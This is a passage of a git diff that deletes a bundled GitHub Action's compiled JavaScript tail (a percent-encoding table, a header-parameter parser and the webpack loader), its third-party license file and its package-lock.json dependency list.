'%A1': '\xa1', '%a2': '\xa2', - '%A2': '\xa2', '%a3': '\xa3', '%A3': '\xa3', '%a4': '\xa4', '%A4': '\xa4', - '%a5': '\xa5', '%A5': '\xa5', '%a6': '\xa6', '%A6': '\xa6', '%a7': '\xa7', - '%A7': '\xa7', '%a8': '\xa8', '%A8': '\xa8', '%a9': '\xa9', '%A9': '\xa9', - '%aa': '\xaa', '%Aa': '\xaa', '%aA': '\xaa', '%AA': '\xaa', '%ab': '\xab', - '%Ab': '\xab', '%aB': '\xab', '%AB': '\xab', '%ac': '\xac', '%Ac': '\xac', - '%aC': '\xac', '%AC': '\xac', '%ad': '\xad', '%Ad': '\xad', '%aD': '\xad', - '%AD': '\xad', '%ae': '\xae', '%Ae': '\xae', '%aE': '\xae', '%AE': '\xae', - '%af': '\xaf', '%Af': '\xaf', '%aF': '\xaf', '%AF': '\xaf', '%b0': '\xb0', - '%B0': '\xb0', '%b1': '\xb1', '%B1': '\xb1', '%b2': '\xb2', '%B2': '\xb2', - '%b3': '\xb3', '%B3': '\xb3', '%b4': '\xb4', '%B4': '\xb4', '%b5': '\xb5', - '%B5': '\xb5', '%b6': '\xb6', '%B6': '\xb6', '%b7': '\xb7', '%B7': '\xb7', - '%b8': '\xb8', '%B8': '\xb8', '%b9': '\xb9', '%B9': '\xb9', '%ba': '\xba', - '%Ba': '\xba', '%bA': '\xba', '%BA': '\xba', '%bb': '\xbb', '%Bb': '\xbb', - '%bB': '\xbb', '%BB': '\xbb', '%bc': '\xbc', '%Bc': '\xbc', '%bC': '\xbc', - '%BC': '\xbc', '%bd': '\xbd', '%Bd': '\xbd', '%bD': '\xbd', '%BD': '\xbd', - '%be': '\xbe', '%Be': '\xbe', '%bE': '\xbe', '%BE': '\xbe', '%bf': '\xbf', - '%Bf': '\xbf', '%bF': '\xbf', '%BF': '\xbf', '%c0': '\xc0', '%C0': '\xc0', - '%c1': '\xc1', '%C1': '\xc1', '%c2': '\xc2', '%C2': '\xc2', '%c3': '\xc3', - '%C3': '\xc3', '%c4': '\xc4', '%C4': '\xc4', '%c5': '\xc5', '%C5': '\xc5', - '%c6': '\xc6', '%C6': '\xc6', '%c7': '\xc7', '%C7': '\xc7', '%c8': '\xc8', - '%C8': '\xc8', '%c9': '\xc9', '%C9': '\xc9', '%ca': '\xca', '%Ca': '\xca', - '%cA': '\xca', '%CA': '\xca', '%cb': '\xcb', '%Cb': '\xcb', '%cB': '\xcb', - '%CB': '\xcb', '%cc': '\xcc', '%Cc': '\xcc', '%cC': '\xcc', '%CC': '\xcc', - '%cd': '\xcd', '%Cd': '\xcd', '%cD': '\xcd', '%CD': '\xcd', '%ce': '\xce', - '%Ce': '\xce', '%cE': '\xce', '%CE': '\xce', '%cf': '\xcf', '%Cf': '\xcf', - '%cF': '\xcf', '%CF': '\xcf', '%d0': '\xd0', '%D0': '\xd0', '%d1': '\xd1', - '%D1': '\xd1', '%d2': '\xd2', '%D2': '\xd2', '%d3': '\xd3', '%D3': '\xd3', - '%d4': '\xd4', '%D4': '\xd4', '%d5': '\xd5', '%D5': '\xd5', '%d6': '\xd6', - '%D6': '\xd6', '%d7': '\xd7', '%D7': '\xd7', '%d8': '\xd8', '%D8': '\xd8', - '%d9': '\xd9', '%D9': '\xd9', '%da': '\xda', '%Da': '\xda', '%dA': '\xda', - '%DA': '\xda', '%db': '\xdb', '%Db': '\xdb', '%dB': '\xdb', '%DB': '\xdb', - '%dc': '\xdc', '%Dc': '\xdc', '%dC': '\xdc', '%DC': '\xdc', '%dd': '\xdd', - '%Dd': '\xdd', '%dD': '\xdd', '%DD': '\xdd', '%de': '\xde', '%De': '\xde', - '%dE': '\xde', '%DE': '\xde', '%df': '\xdf', '%Df': '\xdf', '%dF': '\xdf', - '%DF': '\xdf', '%e0': '\xe0', '%E0': '\xe0', '%e1': '\xe1', '%E1': '\xe1', - '%e2': '\xe2', '%E2': '\xe2', '%e3': '\xe3', '%E3': '\xe3', '%e4': '\xe4', - '%E4': '\xe4', '%e5': '\xe5', '%E5': '\xe5', '%e6': '\xe6', '%E6': '\xe6', - '%e7': '\xe7', '%E7': '\xe7', '%e8': '\xe8', '%E8': '\xe8', '%e9': '\xe9', - '%E9': '\xe9', '%ea': '\xea', '%Ea': '\xea', '%eA': '\xea', '%EA': '\xea', - '%eb': '\xeb', '%Eb': '\xeb', '%eB': '\xeb', '%EB': '\xeb', '%ec': '\xec', - '%Ec': '\xec', '%eC': '\xec', '%EC': '\xec', '%ed': '\xed', '%Ed': '\xed', - '%eD': '\xed', '%ED': '\xed', '%ee': '\xee', '%Ee': '\xee', '%eE': '\xee', - '%EE': '\xee', '%ef': '\xef', '%Ef': '\xef', '%eF': '\xef', '%EF': '\xef', - '%f0': '\xf0', '%F0': '\xf0', '%f1': '\xf1', '%F1': '\xf1', '%f2': '\xf2', - '%F2': '\xf2', '%f3': '\xf3', '%F3': '\xf3', '%f4': '\xf4', '%F4': '\xf4', - '%f5': '\xf5', '%F5': '\xf5', '%f6': '\xf6', '%F6': '\xf6', '%f7': '\xf7', - '%F7': '\xf7', '%f8': '\xf8', '%F8': '\xf8', '%f9': '\xf9', '%F9': '\xf9', - '%fa': '\xfa', '%Fa': '\xfa', '%fA': '\xfa', '%FA': '\xfa', '%fb': '\xfb', - '%Fb': '\xfb', '%fB': '\xfb', '%FB': '\xfb', '%fc': '\xfc', '%Fc': '\xfc', - '%fC': '\xfc', '%FC': '\xfc', '%fd': '\xfd', '%Fd': '\xfd', '%fD': '\xfd', - '%FD': '\xfd', '%fe': '\xfe', '%Fe': '\xfe', '%fE': '\xfe', '%FE': '\xfe', - '%ff': '\xff', '%Ff': '\xff', '%fF': '\xff', '%FF': '\xff' -} - -function encodedReplacer (match) { - return EncodedLookup[match] -} - -const STATE_KEY = 0 -const STATE_VALUE = 1 -const STATE_CHARSET = 2 -const STATE_LANG = 3 - -function parseParams (str) { - const res = [] - let state = STATE_KEY - let charset = '' - let inquote = false - let escaping = false - let p = 0 - let tmp = '' - const len = str.length - - for (var i = 0; i < len; ++i) { // eslint-disable-line no-var - const char = str[i] - if (char === '\\' && inquote) { - if (escaping) { escaping = false } else { - escaping = true - continue - } - } else if (char === '"') { - if (!escaping) { - if (inquote) { - inquote = false - state = STATE_KEY - } else { inquote = true } - continue - } else { escaping = false } - } else { - if (escaping && inquote) { tmp += '\\' } - escaping = false - if ((state === STATE_CHARSET || state === STATE_LANG) && char === "'") { - if (state === STATE_CHARSET) { - state = STATE_LANG - charset = tmp.substring(1) - } else { state = STATE_VALUE } - tmp = '' - continue - } else if (state === STATE_KEY && - (char === '*' || char === '=') && - res.length) { - state = char === '*' - ? STATE_CHARSET - : STATE_VALUE - res[p] = [tmp, undefined] - tmp = '' - continue - } else if (!inquote && char === ';') { - state = STATE_KEY - if (charset) { - if (tmp.length) { - tmp = decodeText(tmp.replace(RE_ENCODED, encodedReplacer), - 'binary', - charset) - } - charset = '' - } else if (tmp.length) { - tmp = decodeText(tmp, 'binary', 'utf8') - } - if (res[p] === undefined) { res[p] = tmp } else { res[p][1] = tmp } - tmp = '' - ++p - continue - } else if (!inquote && (char === ' ' || char === '\t')) { continue } - } - tmp += char - } - if (charset && tmp.length) { - tmp = decodeText(tmp.replace(RE_ENCODED, encodedReplacer), - 'binary', - charset) - } else if (tmp) { - tmp = decodeText(tmp, 'binary', 'utf8') - } - - if (res[p] === undefined) { - if (tmp) { res[p] = tmp } - } else { res[p][1] = tmp } - - return res -} - -module.exports = parseParams - - -/***/ }) - -/******/ }); -/************************************************************************/ -/******/ // The module cache -/******/ var __webpack_module_cache__ = {}; -/******/ -/******/ // The require function -/******/ function __nccwpck_require__(moduleId) { -/******/ // Check if module is in cache -/******/ var cachedModule = __webpack_module_cache__[moduleId]; -/******/ if (cachedModule !== undefined) { -/******/ return cachedModule.exports; -/******/ } -/******/ // Create a new module (and put it into the cache) -/******/ var module = __webpack_module_cache__[moduleId] = { -/******/ // no module.id needed -/******/ // no module.loaded needed -/******/ exports: {} -/******/ }; -/******/ -/******/ // Execute the module function -/******/ var threw = true; -/******/ try { -/******/ __webpack_modules__[moduleId].call(module.exports, module, module.exports, __nccwpck_require__); -/******/ threw = false; -/******/ } finally { -/******/ if(threw) delete __webpack_module_cache__[moduleId]; -/******/ } -/******/ -/******/ // Return the exports of the module -/******/ return module.exports; -/******/ } -/******/ -/************************************************************************/ -/******/ /* webpack/runtime/compat */ -/******/ -/******/ if (typeof __nccwpck_require__ !== 'undefined') __nccwpck_require__.ab = __dirname + "/"; -/******/ -/************************************************************************/ -/******/ -/******/ // startup -/******/ // Load entry module and return exports -/******/ // This entry module is referenced by other modules so it can't be inlined -/******/ var __webpack_exports__ = __nccwpck_require__(6144); -/******/ module.exports = __webpack_exports__; -/******/ -/******/ })() -; \ No newline at end of file diff --git a/.github/action/dist/licenses.txt b/.github/action/dist/licenses.txt deleted file mode 100644 index cd36a2d85ef..00000000000 --- a/.github/action/dist/licenses.txt +++ /dev/null @@ -1,175 +0,0 @@ -@actions/core -MIT -The MIT License (MIT) - -Copyright 2019 GitHub - -Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. - -@actions/exec -MIT -The MIT License (MIT) - -Copyright 2019 GitHub - -Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. - -@actions/http-client -MIT -Actions Http Client for Node.js - -Copyright (c) GitHub, Inc. - -All rights reserved. - -MIT License - -Permission is hereby granted, free of charge, to any person obtaining a copy of this software and -associated documentation files (the "Software"), to deal in the Software without restriction, -including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, -and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, -subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT -LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN -NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, -WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE -SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. - - -@actions/io -MIT -The MIT License (MIT) - -Copyright 2019 GitHub - -Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. - -@actions/tool-cache -MIT -The MIT License (MIT) - -Copyright 2019 GitHub - -Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. - -@fastify/busboy -MIT -Copyright Brian White. All rights reserved. - -Permission is hereby granted, free of charge, to any person obtaining a copy -of this software and associated documentation files (the "Software"), to -deal in the Software without restriction, including without limitation the -rights to use, copy, modify, merge, publish, distribute, sublicense, and/or -sell copies of the Software, and to permit persons to whom the Software is -furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in -all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING -FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS -IN THE SOFTWARE. - -semver -ISC -The ISC License - -Copyright (c) Isaac Z. Schlueter and Contributors - -Permission to use, copy, modify, and/or distribute this software for any -purpose with or without fee is hereby granted, provided that the above -copyright notice and this permission notice appear in all copies. - -THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES -WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF -MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR -ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES -WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN -ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR -IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. - - -tunnel -MIT -The MIT License (MIT) - -Copyright (c) 2012 Koichi Kobayashi - -Permission is hereby granted, free of charge, to any person obtaining a copy -of this software and associated documentation files (the "Software"), to deal -in the Software without restriction, including without limitation the rights -to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -copies of the Software, and to permit persons to whom the Software is -furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in -all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN -THE SOFTWARE. - - -undici -MIT -MIT License - -Copyright (c) Matteo Collina and Undici contributors - -Permission is hereby granted, free of charge, to any person obtaining a copy -of this software and associated documentation files (the "Software"), to deal -in the Software without restriction, including without limitation the rights -to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -copies of the Software, and to permit persons to whom the Software is -furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all -copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -SOFTWARE. - - -uuid -MIT -The MIT License (MIT) - -Copyright (c) 2010-2020 Robert Kieffer and other contributors - -Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: - -The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. diff --git a/.github/action/package-lock.json b/.github/action/package-lock.json deleted file mode 100644 index 9cacb7f9af9..00000000000 --- a/.github/action/package-lock.json +++ /dev/null @@ -1,639 +0,0 @@ -{ - "name": "codeql-actions-action", - "version": "0.1.0", - "lockfileVersion": 2, - "requires": true, - "packages": { - "": { - "name": "codeql-actions-action", - "version": "0.1.0", - "license": "MIT", - "dependencies": { - "@actions/core": "^1.10.1", - "@actions/exec": "^1.1.1", - "@actions/github": "^5.1.1", - "@actions/tool-cache": "^2.0.1" - }, - "devDependencies": { - "@types/node": "^20.12.7", - "@vercel/ncc": "^0.38.0", - "prettier": "^3.0.3", - "typescript": "^5.2.2" - } - }, - "node_modules/@actions/core": { - "version": "1.10.1", - "resolved": "https://registry.npmjs.org/@actions/core/-/core-1.10.1.tgz", - "integrity": "sha512-3lBR9EDAY+iYIpTnTIXmWcNbX3T2kCkAEQGIQx4NVQ0575nk2k3GRZDTPQG+vVtS2izSLmINlxXf0uLtnrTP+g==", - "dependencies": { - "@actions/http-client": "^2.0.1", - "uuid": "^8.3.2" - } - }, - "node_modules/@actions/exec": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/@actions/exec/-/exec-1.1.1.tgz", - "integrity": "sha512-+sCcHHbVdk93a0XT19ECtO/gIXoxvdsgQLzb2fE2/5sIZmWQuluYyjPQtrtTHdU1YzTZ7bAPN4sITq2xi1679w==", - "dependencies": { - "@actions/io": "^1.0.1" - } - }, - "node_modules/@actions/github": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/@actions/github/-/github-5.1.1.tgz", - "integrity": "sha512-Nk59rMDoJaV+mHCOJPXuvB1zIbomlKS0dmSIqPGxd0enAXBnOfn4VWF+CGtRCwXZG9Epa54tZA7VIRlJDS8A6g==", - "dependencies": { - "@actions/http-client": "^2.0.1", - "@octokit/core": "^3.6.0", - "@octokit/plugin-paginate-rest": "^2.17.0", - "@octokit/plugin-rest-endpoint-methods": "^5.13.0" - } - }, - "node_modules/@actions/http-client": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/@actions/http-client/-/http-client-2.2.0.tgz", - "integrity": "sha512-q+epW0trjVUUHboliPb4UF9g2msf+w61b32tAkFEwL/IwP0DQWgbCMM0Hbe3e3WXSKz5VcUXbzJQgy8Hkra/Lg==", - "dependencies": { - "tunnel": "^0.0.6", - "undici": "^5.25.4" - } - }, - "node_modules/@actions/io": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/@actions/io/-/io-1.1.3.tgz", - "integrity": "sha512-wi9JjgKLYS7U/z8PPbco+PvTb/nRWjeoFlJ1Qer83k/3C5PHQi28hiVdeE2kHXmIL99mQFawx8qt/JPjZilJ8Q==" - }, - "node_modules/@actions/tool-cache": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/@actions/tool-cache/-/tool-cache-2.0.1.tgz", - "integrity": "sha512-iPU+mNwrbA8jodY8eyo/0S/QqCKDajiR8OxWTnSk/SnYg0sj8Hp4QcUEVC1YFpHWXtrfbQrE13Jz4k4HXJQKcA==", - "dependencies": { - "@actions/core": "^1.2.6", - "@actions/exec": "^1.0.0", - "@actions/http-client": "^2.0.1", - "@actions/io": "^1.1.1", - "semver": "^6.1.0", - "uuid": "^3.3.2" - } - }, - "node_modules/@actions/tool-cache/node_modules/uuid": { - "version": "3.4.0", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", - "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==", - "deprecated": "Please upgrade to version 7 or higher. Older versions may use Math.random() in certain circumstances, which is known to be problematic. See https://v8.dev/blog/math-random for details.", - "bin": { - "uuid": "bin/uuid" - } - }, - "node_modules/@fastify/busboy": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/@fastify/busboy/-/busboy-2.1.0.tgz", - "integrity": "sha512-+KpH+QxZU7O4675t3mnkQKcZZg56u+K/Ct2K+N2AZYNVK8kyeo/bI18tI8aPm3tvNNRyTWfj6s5tnGNlcbQRsA==", - "engines": { - "node": ">=14" - } - }, - "node_modules/@octokit/auth-token": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/@octokit/auth-token/-/auth-token-2.5.0.tgz", - "integrity": "sha512-r5FVUJCOLl19AxiuZD2VRZ/ORjp/4IN98Of6YJoJOkY75CIBuYfmiNHGrDwXr+aLGG55igl9QrxX3hbiXlLb+g==", - "dependencies": { - "@octokit/types": "^6.0.3" - } - }, - "node_modules/@octokit/core": { - "version": "3.6.0", - "resolved": "https://registry.npmjs.org/@octokit/core/-/core-3.6.0.tgz", - "integrity": "sha512-7RKRKuA4xTjMhY+eG3jthb3hlZCsOwg3rztWh75Xc+ShDWOfDDATWbeZpAHBNRpm4Tv9WgBMOy1zEJYXG6NJ7Q==", - "dependencies": { - "@octokit/auth-token": "^2.4.4", - "@octokit/graphql": "^4.5.8", - "@octokit/request": "^5.6.3", - "@octokit/request-error": "^2.0.5", - "@octokit/types": "^6.0.3", - "before-after-hook": "^2.2.0", - "universal-user-agent": "^6.0.0" - } - }, - "node_modules/@octokit/endpoint": { - "version": "6.0.12", - "resolved": "https://registry.npmjs.org/@octokit/endpoint/-/endpoint-6.0.12.tgz", - "integrity": "sha512-lF3puPwkQWGfkMClXb4k/eUT/nZKQfxinRWJrdZaJO85Dqwo/G0yOC434Jr2ojwafWJMYqFGFa5ms4jJUgujdA==", - "dependencies": { - "@octokit/types": "^6.0.3", - "is-plain-object": "^5.0.0", - "universal-user-agent": "^6.0.0" - } - }, - "node_modules/@octokit/graphql": { - "version": "4.8.0", - "resolved": "https://registry.npmjs.org/@octokit/graphql/-/graphql-4.8.0.tgz", - "integrity": "sha512-0gv+qLSBLKF0z8TKaSKTsS39scVKF9dbMxJpj3U0vC7wjNWFuIpL/z76Qe2fiuCbDRcJSavkXsVtMS6/dtQQsg==", - "dependencies": { - "@octokit/request": "^5.6.0", - "@octokit/types": "^6.0.3", - "universal-user-agent": "^6.0.0" - } - }, - "node_modules/@octokit/openapi-types": { - "version": "12.11.0", - "resolved": "https://registry.npmjs.org/@octokit/openapi-types/-/openapi-types-12.11.0.tgz", - "integrity": "sha512-VsXyi8peyRq9PqIz/tpqiL2w3w80OgVMwBHltTml3LmVvXiphgeqmY9mvBw9Wu7e0QWk/fqD37ux8yP5uVekyQ==" - }, - "node_modules/@octokit/plugin-paginate-rest": { - "version": "2.21.3", - "resolved": "https://registry.npmjs.org/@octokit/plugin-paginate-rest/-/plugin-paginate-rest-2.21.3.tgz", - "integrity": "sha512-aCZTEf0y2h3OLbrgKkrfFdjRL6eSOo8komneVQJnYecAxIej7Bafor2xhuDJOIFau4pk0i/P28/XgtbyPF0ZHw==", - "dependencies": { - "@octokit/types": "^6.40.0" - }, - "peerDependencies": { - "@octokit/core": ">=2" - } - }, - "node_modules/@octokit/plugin-rest-endpoint-methods": { - "version": "5.16.2", - "resolved": "https://registry.npmjs.org/@octokit/plugin-rest-endpoint-methods/-/plugin-rest-endpoint-methods-5.16.2.tgz", - "integrity": "sha512-8QFz29Fg5jDuTPXVtey05BLm7OB+M8fnvE64RNegzX7U+5NUXcOcnpTIK0YfSHBg8gYd0oxIq3IZTe9SfPZiRw==", - "dependencies": { - "@octokit/types": "^6.39.0", - "deprecation": "^2.3.1" - }, - "peerDependencies": { - "@octokit/core": ">=3" - } - }, - "node_modules/@octokit/request": { - "version": "5.6.3", - "resolved": "https://registry.npmjs.org/@octokit/request/-/request-5.6.3.tgz", - "integrity": "sha512-bFJl0I1KVc9jYTe9tdGGpAMPy32dLBXXo1dS/YwSCTL/2nd9XeHsY616RE3HPXDVk+a+dBuzyz5YdlXwcDTr2A==", - "dependencies": { - "@octokit/endpoint": "^6.0.1", - "@octokit/request-error": "^2.1.0", - "@octokit/types": "^6.16.1", - "is-plain-object": "^5.0.0", - "node-fetch": "^2.6.7", - "universal-user-agent": "^6.0.0" - } - }, - "node_modules/@octokit/request-error": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/@octokit/request-error/-/request-error-2.1.0.tgz", - "integrity": "sha512-1VIvgXxs9WHSjicsRwq8PlR2LR2x6DwsJAaFgzdi0JfJoGSO8mYI/cHJQ+9FbN21aa+DrgNLnwObmyeSC8Rmpg==", - "dependencies": { - "@octokit/types": "^6.0.3", - "deprecation": "^2.0.0", - "once": "^1.4.0" - } - }, - "node_modules/@octokit/types": { - "version": "6.41.0", - "resolved": "https://registry.npmjs.org/@octokit/types/-/types-6.41.0.tgz", - "integrity": "sha512-eJ2jbzjdijiL3B4PrSQaSjuF2sPEQPVCPzBvTHJD9Nz+9dw2SGH4K4xeQJ77YfTq5bRQ+bD8wT11JbeDPmxmGg==", - "dependencies": { - "@octokit/openapi-types": "^12.11.0" - } - }, - "node_modules/@types/node": { - "version": "20.12.7", - "resolved": "https://registry.npmjs.org/@types/node/-/node-20.12.7.tgz", - "integrity": "sha512-wq0cICSkRLVaf3UGLMGItu/PtdY7oaXaI/RVU+xliKVOtRna3PRY57ZDfztpDL0n11vfymMUnXv8QwYCO7L1wg==", - "dev": true, - "dependencies": { - "undici-types": "~5.26.4" - } - }, - "node_modules/@vercel/ncc": { - "version": "0.38.1", - "resolved": "https://registry.npmjs.org/@vercel/ncc/-/ncc-0.38.1.tgz", - "integrity": "sha512-IBBb+iI2NLu4VQn3Vwldyi2QwaXt5+hTyh58ggAMoCGE6DJmPvwL3KPBWcJl1m9LYPChBLE980Jw+CS4Wokqxw==", - "dev": true, - "bin": { - "ncc": "dist/ncc/cli.js" - } - }, - "node_modules/before-after-hook": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/before-after-hook/-/before-after-hook-2.2.3.tgz", - "integrity": "sha512-NzUnlZexiaH/46WDhANlyR2bXRopNg4F/zuSA3OpZnllCUgRaOF2znDioDWrmbNVsuZk6l9pMquQB38cfBZwkQ==" - }, - "node_modules/deprecation": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/deprecation/-/deprecation-2.3.1.tgz", - "integrity": "sha512-xmHIy4F3scKVwMsQ4WnVaS8bHOx0DmVwRywosKhaILI0ywMDWPtBSku2HNxRvF7jtwDRsoEwYQSfbxj8b7RlJQ==" - }, - "node_modules/is-plain-object": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/is-plain-object/-/is-plain-object-5.0.0.tgz", - "integrity": 